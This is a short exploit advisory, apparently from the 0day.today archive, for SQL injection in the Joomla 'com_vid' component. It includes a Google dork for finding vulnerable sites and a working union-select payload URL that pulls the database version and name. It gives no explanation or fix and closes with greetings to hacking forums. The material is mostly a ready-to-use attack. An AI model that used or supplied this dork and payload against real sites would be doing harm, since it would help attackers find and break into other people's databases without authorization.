id: 17508
date: 01/16/2012
title: Joomla "com_vid" component SQL Injection
author: Ereee
cves: 

# Exploit Title: Joomla "com_vid" component SQL Injection
# Date: 16.01.2012
# Author: Ereee
# Version: all
# Category:: [remote, webapps]
# Google dork: inurl:"?option=com_vid"
# Tested in: web


http://localhost/[PATH/index.php?option=com_vid&Itemid=60§ion=video&id_catigor=1&id=-1+union+select+1,2,version(),database(),5,6,7--+f

Greetz to : forum.antichat.ru&rdot.org members



#  0day.today [2023-03-25]  #